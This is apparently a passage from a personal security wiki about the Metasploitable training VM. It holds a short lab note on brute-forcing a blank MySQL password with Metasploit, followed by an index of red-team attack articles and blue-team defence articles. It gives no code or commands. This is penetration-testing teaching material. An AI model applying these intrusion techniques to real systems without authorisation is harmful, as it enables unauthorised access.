We began with MySQL. We were able to use Metasploit to brute-force the MySQL login. This was pretty trivial, since the password was blank.
Now that we've compromised the MySQL database, we've seen that there are several web services running - two instances of TikiWiki, an instance of Damn Vulnerable Web App, and information from/about owasp. The MySQL database gave us plenty of new attack vectors to dive into.
Flags
 |
Metasploit any and all resources related to metasploit on this wiki
Category:Metasploit - pages labeled with the "Metasploit" category label MSF/Wordlists - wordlists that come bundled with Metasploit MSFVenom - msfvenom is used to craft payloads Meterpreter - the shell you'll have when you use MSF to craft a remote shell payload.
Category:Security · Category:Metasploit · Category:Kali
|
|
Metasploitable: The Red Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the RED TEAM's tools and routes of attack.
Exploiting MySQL with Metasploit: Metasploitable/MySQL Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres
Exploiting VSFTP Backdoor: Metasploitable/VSFTP SSH Penetration by Brute Force: Metasploitable/SSH/Brute Force SSH Penetration with Keys: Metasploitable/SSH/Keys SSH Penetration with Metasploit: Metasploitable/SSH/Exploits Brute-Forcing Exploiting NFS: Metasploitable/NFS Exploiting DNS Bind Server: Metasploitable/DNS Bind
Metasploitable Services: distcc: Metasploitable/distcc
Metasploitable Apache: Exploiting Apache (with Metasploit): Metasploitable/Apache Exploiting Apache (with Python): Metasploitable/Apache/Python Tor's Hammer DoS Attack: Metasploitable/TorsHammer * Apache DAV: Metasploitable/Apache/DAV * Apache Tomcat and Coyote: Metasploitable/Apache/Tomcat and Coyote
Metasploitable Memory: General approach to memory-based attacks: Metasploitable/Memory Investigating memory data: Metasploitable/Volatile Data Investigation Dumping Memory from Metasploit: Metasploitable/Dumping Memory
Metasploitable Fuzzing: (Have not done much work on fuzzing Metasploitable...)
Category:Security · Category:Metasploit · Category:Metasploitable · Category:Kali
|
|
Metasploitablue: The Blue Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the BLUE TEAM's methods for defending Metasploitable: defending against and responding to intrusions.
Hence the name, Metasploita-blue. Overview: Metasploitable/Defenses Metasploitable/Defenses/Stopping · Metasploitable/Defenses/Detecting
Metasploitable On-Machine Defenses: Linux Volatile Data System Investigation: Metasploitable/Volatile Data Investigation Linux Artifact Investigation: Metasploitable/Artifact Investigation Linux Iptables Essentials: Metasploitable/Iptables Firewall Assurance and Testing: Metasploitable/Firewall Password Assessment: Metasploitable/Password Assessment Standard Unix Ports: Unix/Ports
Netcat and Cryptcat (Blue Team): Metasploitable/Netcat and Metasploitable/Cryptcat Nmap (Blue Team): Metasploitable/Nmap Network Traffic Analysis: Metasploitable/Network Traffic Analysis Suspicious Traffic Patterns: Metasploitable/Suspicious Traffic Patterns Snort IDS: Metasploitable/Snort
|